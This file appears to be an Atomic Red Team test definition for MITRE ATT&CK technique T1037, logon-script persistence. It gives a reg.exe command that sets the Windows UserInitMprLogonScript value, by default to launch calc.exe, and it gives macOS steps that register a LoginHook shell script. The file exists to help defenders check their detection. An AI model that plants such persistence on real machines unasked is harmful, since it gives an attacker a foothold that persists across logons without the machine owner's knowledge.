atomic-red-team/atomics/T1037/T1037.yaml

---
attack_technique: T1037
display_name: Logon Scripts

atomic_tests:
- name: Logon Scripts
  description: |
    Added Via Reg.exe

  supported_platforms:
    - windows

  input_arguments:
    script_command:
      description: Command To Execute
      type: String
      default: cmd.exe /c calc.exe

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}"
    cleanup_command: |
      REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f

- name: Logon Scripts - Mac
  description: |
    Mac logon script

  supported_platforms:
    - macos

  executor:
    name: manual
    steps: |
      1. Create the required plist file

          sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist

      2. Populate the plist with the location of your shell script

          sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh

      3. Create the required plist file in the target user's Preferences directory

      	  touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist

      4. Populate the plist with the location of your shell script

      	  defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh